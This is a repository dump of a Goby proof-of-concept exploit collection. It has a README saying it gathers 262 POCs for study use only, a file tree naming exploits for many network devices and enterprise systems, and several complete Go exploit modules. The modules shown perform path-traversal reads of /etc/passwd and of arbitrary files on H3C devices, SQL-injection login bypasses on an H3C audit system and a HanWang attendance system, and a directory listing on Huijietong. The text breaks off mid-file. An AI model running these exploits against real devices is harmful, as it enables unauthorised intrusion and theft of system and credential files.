├── README.md ├── go ├── ACTI_camera_images_File_read.go ├── AceNet_AceReporter_Report_component_Arbitrary_file_download.go ├── D_Link_Dir_645_getcfg.php_Account_password_disclosure_CVE_2019_17506.go ├── D_Link_ShareCenter_DNS_320_system_mgr.cgi_RCE.go ├── ESAFENET_DLP_dataimport_RCE.go ├── Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go ├── Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go ├── FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go ├── ForgeRock_AM_RCE_CVE_2021_35464.go ├── H3C_HG659_lib_File_read.go ├── H3C_IMC_dynamiccontent.properties.xhtm_RCE.go ├── H3C_Next_generation_firewall_File_read.go ├── H3C_SecPath_Operation_Login_bypass.go ├── HEJIA_PEMS_SystemLog.cgi_Arbitrary_file_download.go ├── HanWang_Time_Attendance_SQL_injection.go ├── Holographic_AI_network_operation_and_maintenance_platform_RCE.go ├── Huijietong_cloud_video_fileDownload_File_read.go ├── Huijietong_cloud_video_list_Information_leakage.go ├── JEEWMS_Arbitrary_File_Read_Vulnerability.go ├── Jellyfin_Audio_File_read_CVE_2021_21402.go ├── JingHe_OA_download.asp_File_read.go ├── Kingdee_EAS_server_file_Directory_traversal.go ├── LanhaiZuoyue_system_debug.php_RCE.go ├── LanhaiZuoyue_system_download.php_File_read.go ├── Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go ├── Many_network_devices_have_arbitrary_file_downloads.go ├── Many_network_devices_have_password_leaks.go ├── NVS3000_integrated_video_surveillance_platform_is_not_accessible.go ├── Node_red_UI_base_Arbitrary_File_Read_Vulnerability_CVE_2021_3223.go ├── Panabit_Application_Gateway_ajax_top_backstage_RCE.go ├── Panabit_Panalog_cmdhandle.php_backstage_RCE.go ├── Panabit_iXCache_ajax_cmd_backstage_RCE.go ├── Qilai_OA_CloseMsg.aspx_SQL_injection.go ├── SECWORLD_Next_generation_firewall_pki_file_download_File_read.go ├── SPON_IP_network_intercom_broadcast_system_exportrecord.php_any_file_download.go ├── SPON_IP_network_intercom_broadcast_system_getjson.php_Arbitrary_file_read.go ├── 
SPON_IP_network_intercom_broadcast_system_ping.php_RCE.go ├── SPON_IP_network_intercom_broadcast_system_rj_get_token.php_any_file_read.go ├── Selea_OCR_ANPR_SeleaCamera_File_read.go ├── Selea_OCR_ANPR_get_file.php_File_read.go ├── Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__ping_RCE.go ├── Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__tracert_RCE.go ├── ShiziyuCms_ApiController.class.php_SQL_injection.go ├── ShiziyuCms_ApigoodsController.class.php_SQL_injection.go ├── ShiziyuCms_wxapp.php_File_update.go ├── ShopXO_download_File_read_CNVD_2021_15822.go ├── TamronOS_IPTV_ping_RCE.go ├── Tongda_OA_api.ali.php_RCE.go ├── TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go ├── Tuchuang_Library_System_Arbitrary_Reading_File_CNVD_2021_34454.go ├── WangKang_NS_ASG_cert_download.php_File_read.go ├── WangKang_Next_generation_firewall_router_RCE.go ├── Weaver_OA_E_Cology_Workflowservicexml_RCE.go ├── Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go ├── ZZZCMS_parserSearch_RCE.go ├── ZhongQing_naibo_Education_Cloud_Platform_Information_leakage.go ├── ZhongQing_naibo_Education_Cloud_platform_reset_password.go ├── ZhongkeWangwei_Next_generation_firewall_File_read.go ├── Zhongxing_F460_web_shell_cmd.gch_RCE.go ├── dahua_DSS_Arbitrary_file_download_cnvd_2020_61986.go ├── nsoft_EWEBS_casmain.xgi_File_read.go ├── showDocGo.go ├── showDocJson.go └── xiaomi_Mi_wiFi_From_File_Read_To_Login_CVE_2019_18370.go └── json ├── 360_TianQing_ccid_SQL_injectable.json ├── 360_Tianqing_database_information_disclosure.json ├── ADSelfService_Plus_RCE_CVE_2021_40539.json ├── Active_UC_index.action_RCE.json ├── Adslr_Enterprise_online_behavior_management_system_Information_leakage.json ├── Alibaba Nacos 控制台默认弱口令.json ├── Alibaba Nacos 未授权访问漏洞.json ├── Alibaba_Nacos_Add_user_not_authorized.json ├── Alibaba_Nacos_Default_password.json ├── Apache ActiveMQ Console控制台弱口令.json ├── Apache Cocoon Xml 注入 CVE-2020-11991.json ├── Apache Kylin Console 控制台弱口令.json ├── Apache Kylin 未授权配置泄露 
CVE-2020-13937.json ├── Apache Solr任意文件读取漏洞.json ├── Apache_2.4.49_Path_Traversal_CVE_2021_41773.json ├── Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json ├── Apache_APISIX_Dashboard_CVE_2021_45232.json ├── Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json ├── Apache_ActiveMQ_Console_Weak_Password.json ├── Apache_Airflow_Unauthorized.json ├── Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json ├── Apache_Druid_Arbitrary_File_Read_CVE_2021_36749.json ├── Apache_Druid_Log4shell_CVE_2021_44228.json ├── Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json ├── Apache_HTTP_Server_SSRF_CVE_2021_40438.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json ├── Apache_Kylin_Console_Default_password.json ├── Apache_Kylin_Unauthorized_configuration_disclosure.json ├── Apache_OFBiz_Log4shell_CVE_2021_44228.json ├── Apache_SkyWalking_Log4shell_CVE_2021_44228.json ├── Apache_Solr_Arbitrary_File_Read.json ├── Apache_Solr_RemoteStreaming_File_Read.json ├── Aspcms_Backend_Leak.json ├── Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json ├── Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json ├── Atlassian_Jira_user_information_disclosure.json ├── CVE_2018_19367_.json ├── Cacti_Weathermap_File_Write.json ├── China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json ├── China_Mobile_Yu_routed_the_login_bypass.json ├── Citrix_Unauthorized_CVE_2020_8193.json ├── ClickHouse_SQLI.json ├── ClusterEngineV4.0_RCE_.json ├── ClusterEngine_V4.0_Shell_cluster_RCE.json ├── Coldfusion_LFI_CVE_2010_2861.json ├── Confluence_RCE_CVE_2021_26084.json ├── Consul_Rexec_RCE.json ├── Coremail_configuration_information_disclosure.json ├── Couch_CMS_Infoleak_CVE_2018_7662.json ├── Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json ├── Couchdb_Unauth.json ├── CraftCMS_Seomatic_RCE_CVE_2020_9597.json ├── D-Link AC集中管理系统默认弱口令.json ├── D-Link DCS系列监控 CNVD-2020-25078.json ├── D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078.json ├── 
D_Link_AC_Centralized_management_system__Default_weak_password.json ├── D_Link_DC_Disclosure_of_account_password_information.json ├── D_Link_DIR_868L_getcfg.php_Account_password_leakage.json ├── D_Link_ShareCenter_DNS_320_RCE.json ├── Datang_AC_Default_Password.json ├── DedeCMS_Carbuyaction_FileInclude.json ├── DedeCMS_InfoLeak_CVE_2018_6910.json ├── Discuz_ML_3.x_RCE__CNVD_2019_22239.json ├── Discuz_RCE_WOOYUN_2010_080723.json ├── Discuz_Wechat_Plugins_Unauth.json ├── Discuz_v72_SQLI.json ├── Dlink_850L_Info_Leak.json ├── Dlink_Info_Leak_CVE_2019_17506.json ├── Dlink_RCE_CVE_2019_16920.json ├── Docker_Registry_API_Unauth.json ├── Dubbo_Admin_Default_Password.json ├── Eyou_Mail_system_RCE.json ├── F5_BIG_IP_RCE_CVE_2021_22986_exp.json ├── Fastmeeting_Arbitrary_File_Read.json ├── FineReport_Directory_traversal.json ├── FineReport_v8.0_Arbitrary_file_read_.json ├── FineReport_v9_Arbitrary_File_Overwrite.json ├── Finetree_5MP_default_password_or_Unauthorized_user_added.json ├── GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.json ├── GitLab_Graphql_Email_information_disclosure.json ├── GitLab_SSRF_CVE_2021_22214.json ├── Gitlab_RCE_CVE_2021_22205.json ├── Grafana_Arbitrary_file_read.json ├── Grafana_Plugins_Arbitrary_File_Read.json ├── H3C_IMC_RCE.json ├── H5S_video_platform_GetSrc_information_leakage.json ├── H5S_video_platform_GetUserInfo_Account_password_leakage.json ├── HIKVISION 视频编码设备接入网关 任意文件下载.json ├── HIKVISION_Video_coding_equipment_Download_any_file.json ├── Hikvision_RCE_CVE_2021_36260.json ├── Hsmedia_Hgateway_Default_account.json ├── IFW8_Enterprise_router_Password_leakage_.json ├── IRDM4000_Smart_station_Unauthorized_access.json ├── IceWarp_WebClient_basic_RCE.json ├── JQuery_1.7.2Version_site_foreground_arbitrary_file_download.json ├── Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json ├── Jellyfin_SSRF_CVE_2021_29490.json ├── JingHe_OA_C6_Default_password.json ├── Jinher_OA_C6_download.jsp_Arbitrary_file_read.json ├── Jinshan_V8.json ├── 
Jitong_EWEBS_arbitrary_file_read.json ├── Jitong_EWEBS_phpinfo_leak.json ├── KEDACOM_MTS_transcoding_server_Arbitrary_file_download_CNVD_2020_48650.json ├── Kingsoft_V8_Arbitrary_file_read.json ├── Kingsoft_V8_Default_weak_password.json ├── Konga_Default_JWT_KEY.json ├── Kyan.json ├── Kyan_Account_password_leak.json ├── Kyan_design_account_password_disclosure.json ├── Kyan_run.php_RCE.json ├── Lanproxy 目录遍历漏洞 CVE-2021-3019.json ├── Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json ├── Lanproxy_Directory_traversal_CVE_2021_3019.json ├── Laravel .env 配置文件泄露 CVE-2017-16894.json ├── Laravel_.env_configuration_file_leaks_(CVE-2017-16894).json ├── Leadsec_ACM_information_leakage_CNVD_2016_08574.json ├── MPSec_ISG1000_Security_Gateway_Arbitrary_File_Download_Vulnerability.json ├── MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.json ├── MessageSolution_EEA_information_disclosure.json ├── Metabase_Geojson_Arbitrary_File_Read_CVE_2021_41277.json ├── Metabase_geojson_Arbitrary_file_reading_CVE_2021_41277.json ├── Micro_module_monitoring_system_User_list.php_information_leakage.json ├── Microsoft Exchange SSRF漏洞 CVE-2021-26885.json ├── MobileIron_Log4shell_CVE_2021_44228.json ├── Node_RED_ui_base_Arbitrary_File_Read.json ├── OpenSNS_RCE.json ├── RG_UAC.json ├── Ruijie_smartweb_password_information_disclosure.json ├── Ruijie_smartweb_weak_password.json ├── RuoYi_Druid_Unauthorized_access.json ├── SDWAN_smart_gateway_weak_password.json ├── Samsung_WLAN_AP_RCE.json ├── Samsung_WLAN_AP_WEA453e_RCE.json ├── Samsung_WLAN_AP_wea453e_router_RCE.json ├── Security_Devices_Hardcoded_Password.json ├── Seeyon_OA_A6_DownExcelBeanServlet_User_information_leakage.json ├── Seeyon_OA_A6__Disclosure_of_database_sensitive_information.json ├── Seeyon_OA_A6_initDataAssess.jsp_User_information_leakage.json ├── Seeyon_OA_A6_setextno.jsp_SQL_injection.json ├── Seeyon_OA_A6_test.jsp_SQL_injection.json ├── Seeyon_OA_A8_m_Information_leakage.json ├── 
ShopXO_download_Arbitrary_file_read_CNVD_2021_15822.json ├── SonarQube_unauth_CVE_2020_27986.json ├── SonicWall SSL-VPN 远程命令执行漏洞.json ├── SonicWall_SSL_VPN_RCE.json ├── Struts2_Log4Shell_CVE_2021_44228_1.json ├── Struts2_Log4Shell_CVE_2021_44228_2.json ├── Struts2_Log4Shell_CVE_2021_44228_3.json ├── TamronOS_IPTV_Arbitrary_file_download.json ├── TamronOS_IPTV_RCE.json ├── Tianwen_ERP_system__uploadfile.aspx_Arbitraryvfilevupload.json ├── U8_OA.json ├── UniFi_Network_Log4shell_CVE_2021_44228.json ├── VENGD_Arbitrary_File_Upload.json ├── VMWare_Horizon_Log4shell_CVE_2021_44228.json ├── VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json ├── VMware_NSX_Log4shell_CVE_2021_44228.json ├── VMware_vCenter_Log4shell_CVE_2021_44228_1.json ├── VMware_vCenter_v7.0.2_Arbitrary_File_Read.json ├── Wayos AC集中管理系统默认弱口令 CNVD-2021-00876.json ├── Wayos_AC_Centralized_management_system_Default_weak_password.json ├── Weaver_EOffice_Arbitrary_File_Upload_CNVD_2021_49104.json ├── Weaver_OA_8_SQL_injection.json ├── Weaver_e_office_UploadFile.php_file_upload_CNVD_2021_49104.json ├── Weblogic LDAP Internet RCE CVE-2021-2109.json ├── Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109.json ├── Weblogic SSRF漏洞 CVE-2014-4210.json ├── Weblogic_LDAP_RCE_CVE_2021_2109.json ├── Weblogic_SSRF.json ├── XXL-JOB 任务调度中心 后台默认弱口令.json ├── XXL_JOB_Default_password.json ├── Xieda_oa.json ├── YAPI_RCE.json ├── Yinpeng_Hanming_Video_Conferencing__Arbitrary_file_read.json ├── Yonyou_UFIDA_NC_bsh.servlet.BshServlet_rce.json ├── ZhongXinJingDun_Default_administrator_password.json ├── alibaba_canal_default_password.json ├── chanjet_CRM_get_usedspace.php_sql_injection.json ├── dahua_DSS_Arbitrary_file_download.json ├── fahuo100_sql_injection_CNVD_2021_30193.json ├── firewall_Leaked_user_name_and_password.json ├── landray_OA_Arbitrary_file_read.json ├── mallgard.json ├── php8.1backdoor.json ├── sangfor_Behavior_perception_system_c.php_RCE.json ├── shtermQiZhi_Fortress_Arbitrary_User_Login.json ├── 
tongdaoa_unauth.json ├── yongyou_NC_bsh.servlet.BshServlet_RCE.json ├── yycms_XSS.json ├── 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757.json ├── 来福云SQL注入漏洞.json ├── 致远OA A6 数据库敏感信息泄露.json ├── 致远OA A6 用户敏感信息泄露.json ├── 致远OA webmail.do任意文件下载 CNVD-2020-62422.json ├── 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.json └── 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞.json /README.md: -------------------------------------------------------------------------------- 1 | # Goby_POC 2 | 在互联网中搜集的262个goby poc 3 | 4 | 5 | 6 | 7 | ## 部分poc来自以下项目 8 | - [https://github.com/aetkrad/goby_poc](https://github.com/aetkrad/goby_poc) 9 | - [https://github.com/H4K6/Goby-POC](https://github.com/H4K6/Goby-POC) 10 | - [https://github.com/XingHuoLiaoYuanBaby/goby_poc](https://github.com/XingHuoLiaoYuanBaby/goby_poc) 11 | 12 | # 仅限用于合法和学习研究用途!仅限用于合法和学习研究用途!仅限用于合法和学习研究用途! 13 | -------------------------------------------------------------------------------- /go/H3C_HG659_lib_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "H3C HG659 lib File Read", 16 | "Description": "H3C HG659 is any file read, can read any file server", 17 | "Product": "H3C HG659", 18 | "Homepage": "https://www.huawei.com/", 19 | "DisclosureDate": "2021-06-15", 20 | "Author": "PeiQi", 21 | "GobyQuery": "app=\"HuaWei-Home-Gateway\"", 22 | "Level": "2", 23 | "Impact": "
File read
", 24 | "Recommendation": "Update", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "File", 32 | "type": "input", 33 | "value": "/etc/passwd" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "File read" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "H3C HG659" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "undefined
" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/lib///....//....//....//....//....//....//....//....//etc//passwd" 62 | cfg := httpclient.NewGetRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 67 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root:") 68 | } 69 | return false 70 | }, 71 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 72 | file := ss.Params["File"].(string) 73 | file = strings.Replace(file, "/", "//", -1) 74 | uri := "/lib///....//....//....//....//....//....//....//...." + file 75 | cfg := httpclient.NewGetRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 80 | if resp.StatusCode == 200 { 81 | expResult.Output = resp.RawBody 82 | expResult.Success = true 83 | } 84 | } 85 | return expResult 86 | }, 87 | )) 88 | } 89 | -------------------------------------------------------------------------------- /go/H3C_Next_generation_firewall_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "H3C Next generation firewall File read", 15 | "Description": "Attackers can download arbitrary files on the server through the vulnerability", 16 | "Product": "H3C 
Next generation firewall", 17 | "Homepage": "http://www.h3c.com.cn", 18 | "DisclosureDate": "2021-05-28", 19 | "Author": "PeiQi", 20 | "GobyQuery": "app=\"H3C-Firewall\"", 21 | "Level": "2", 22 | "Impact": "File read
", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": true, 28 | "ExpParams": [ 29 | { 30 | "name": "File", 31 | "type": "input", 32 | "value": "/etc/passwd" 33 | } 34 | ], 35 | "ExpTips": { 36 | "Type": "", 37 | "Content": "" 38 | }, 39 | "ScanSteps": [ 40 | "AND" 41 | ], 42 | "ExploitSteps": null, 43 | "Tags": [ 44 | "File read" 45 | ], 46 | "CVEIDs": null, 47 | "CVSSScore": "0.0", 48 | "AttackSurfaces": { 49 | "Application": [ 50 | "H3C Next generation firewall" 51 | ], 52 | "Support": null, 53 | "Service": null, 54 | "System": null, 55 | "Hardware": null 56 | }, 57 | "Recommandation": "undefined
" 58 | }` 59 | 60 | ExpManager.AddExploit(NewExploit( 61 | goutils.GetFileName(), 62 | expJson, 63 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 64 | uri := "/webui/?g=sys_dia_data_down&file_name=../../../../../etc/passwd" 65 | cfg := httpclient.NewGetRequestConfig(uri) 66 | cfg.VerifyTls = false 67 | cfg.FollowRedirect = false 68 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 69 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 70 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root") 71 | } 72 | return false 73 | }, 74 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 75 | file := ss.Params["File"].(string) 76 | uri := "/webui/?g=sys_dia_data_down&file_name=../../../../.." + file 77 | cfg := httpclient.NewGetRequestConfig(uri) 78 | cfg.VerifyTls = false 79 | cfg.FollowRedirect = false 80 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 81 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 82 | expResult.Output = resp.RawBody 83 | expResult.Success = true 84 | } 85 | return expResult 86 | }, 87 | )) 88 | } -------------------------------------------------------------------------------- /go/H3C_SecPath_Operation_Login_bypass.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "H3C SecPath Operation Login bypass", 15 | "Description": "H3C SecPath Operation Login bypass", 16 | "Product": "H3C SecPath", 17 | "Homepage": "https://www.h3c.com.cn", 18 | "DisclosureDate": "2021-05-18", 19 | "Author": "PeiQi", 20 | "GobyQuery": 
"app=\"H3C-SecPath-Operation-and-maintenance-audit-system\"", 21 | "Level": "1", 22 | "Impact": "Login bypass", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "data": "", 34 | "data_type": "text", 35 | "follow_redirect": true, 36 | "method": "GET", 37 | "uri": "/" 38 | }, 39 | "ResponseTest": { 40 | "checks": [ 41 | { 42 | "bz": "", 43 | "operation": "==", 44 | "type": "item", 45 | "value": "200", 46 | "variable": "$code" 47 | } 48 | ], 49 | "operation": "AND", 50 | "type": "group" 51 | } 52 | } 53 | ], 54 | "ExploitSteps": null, 55 | "Tags": ["RCE"], 56 | "CVEIDs": null, 57 | "CVSSScore": "0.0", 58 | "AttackSurfaces": { 59 | "Application": ["H3C IMC"], 60 | "Support": null, 61 | "Service": null, 62 | "System": null, 63 | "Hardware": null 64 | } 65 | }` 66 | 67 | ExpManager.AddExploit(NewExploit( 68 | goutils.GetFileName(), 69 | expJson, 70 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 71 | uri := "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" 72 | cfg := httpclient.NewGetRequestConfig(uri) 73 | cfg.VerifyTls = false 74 | cfg.FollowRedirect = false 75 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 76 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 77 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "审计管理员") 78 | } 79 | return false 80 | }, 81 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 82 | return expResult 83 | }, 84 | )) 85 | } -------------------------------------------------------------------------------- /go/HanWang_Time_Attendance_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 
5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "HanWang Time Attendance SQL injection", 15 | "Description": "HanWang Time Attendance SQL injection", 16 | "Product": "HanWang Time Attendance", 17 | "Homepage": "https://www.hw99.com/", 18 | "DisclosureDate": "2021-05-19", 19 | "Author": "PeiQi", 20 | "GobyQuery": "title=\"汉王人脸考勤管理系统\"", 21 | "Level": "2", 22 | "Impact": "SQL injection", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ExpTips": { 30 | "Type": "", 31 | "Content": "" 32 | }, 33 | "ScanSteps": [ 34 | "AND", 35 | { 36 | "Request": { 37 | "data": "", 38 | "data_type": "text", 39 | "follow_redirect": true, 40 | "method": "GET", 41 | "uri": "/" 42 | }, 43 | "ResponseTest": { 44 | "checks": [ 45 | { 46 | "bz": "", 47 | "operation": "==", 48 | "type": "item", 49 | "value": "200", 50 | "variable": "$code" 51 | } 52 | ], 53 | "operation": "AND", 54 | "type": "group" 55 | } 56 | } 57 | ], 58 | "ExploitSteps": null, 59 | "Tags": ["SQL injection"], 60 | "CVEIDs": null, 61 | "CVSSScore": "0.0", 62 | "AttackSurfaces": { 63 | "Application": ["HanWang Time Attendance"], 64 | "Support": null, 65 | "Service": null, 66 | "System": null, 67 | "Hardware": null 68 | } 69 | }` 70 | 71 | ExpManager.AddExploit(NewExploit( 72 | goutils.GetFileName(), 73 | expJson, 74 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 75 | uri := "/Login/Check" 76 | cfg := httpclient.NewPostRequestConfig(uri) 77 | cfg.VerifyTls = false 78 | cfg.FollowRedirect = false 79 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 80 | cfg.Data = "strName=admin' or 1=1--&strPwd=admin" 81 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 82 | 
return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "ok") 83 | } 84 | return false 85 | }, 86 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 87 | return expResult 88 | }, 89 | )) 90 | } -------------------------------------------------------------------------------- /go/Huijietong_cloud_video_list_Information_leakage.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "Huijietong cloud video list Information leakage", 15 | "Description": "Huijietong cloud video list Information leakage", 16 | "Product": "Huijietong cloud video", 17 | "Homepage": "http://www.hjtcloud.com/", 18 | "DisclosureDate": "2021-05-17", 19 | "Author": "PeiQi", 20 | "GobyQuery": "body=\"/him/api/rest/v1.0/node/role\"", 21 | "Level": "1", 22 | "Impact": "Server Information leakage", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": [ 29 | { 30 | "name": "", 31 | "type": "", 32 | "value": "" 33 | } 34 | ], 35 | "ExpTips": { 36 | "Type": "", 37 | "Content": "" 38 | }, 39 | "ScanSteps": [ 40 | "AND", 41 | { 42 | "Request": { 43 | "data": "", 44 | "data_type": "text", 45 | "follow_redirect": true, 46 | "method": "GET", 47 | "uri": "/" 48 | }, 49 | "ResponseTest": { 50 | "checks": [ 51 | { 52 | "bz": "", 53 | "operation": "==", 54 | "type": "item", 55 | "value": "200", 56 | "variable": "$code" 57 | } 58 | ], 59 | "operation": "AND", 60 | "type": "group" 61 | } 62 | } 63 | ], 64 | "ExploitSteps": null, 65 | "Tags": ["Information leakage"], 66 | "CVEIDs": null, 67 | "CVSSScore": "0.0", 68 | "AttackSurfaces": { 69 | "Application": 
["Huijietong cloud video"], 70 | "Support": null, 71 | "Service": null, 72 | "System": null, 73 | "Hardware": null 74 | } 75 | }` 76 | 77 | ExpManager.AddExploit(NewExploit( 78 | goutils.GetFileName(), 79 | expJson, 80 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 81 | uri := "/him/api/rest/V1.0/system/log/list?filePath=../" 82 | cfg := httpclient.NewGetRequestConfig(uri) 83 | cfg.VerifyTls = false 84 | cfg.FollowRedirect = false 85 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 86 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 87 | return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "absolutePath") 88 | } 89 | return false 90 | }, 91 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 92 | return expResult 93 | }, 94 | )) 95 | } 96 | -------------------------------------------------------------------------------- /go/JingHe_OA_download.asp_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | "net/url" 12 | ) 13 | 14 | func init() { 15 | expJson := `{ 16 | "Name": "JingHe OA download.asp File read", 17 | "Description": "There is an arbitrary file reading vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server", 18 | "Product": "JingHe OA", 19 | "Homepage": "http://www.jinher.com/", 20 | "DisclosureDate": "2021-06-09", 21 | "Author": "PeiQi", 22 | "GobyQuery": "app=\"Jinher-OA\"", 23 | "Level": "2", 24 | "Impact": "JingHe OA
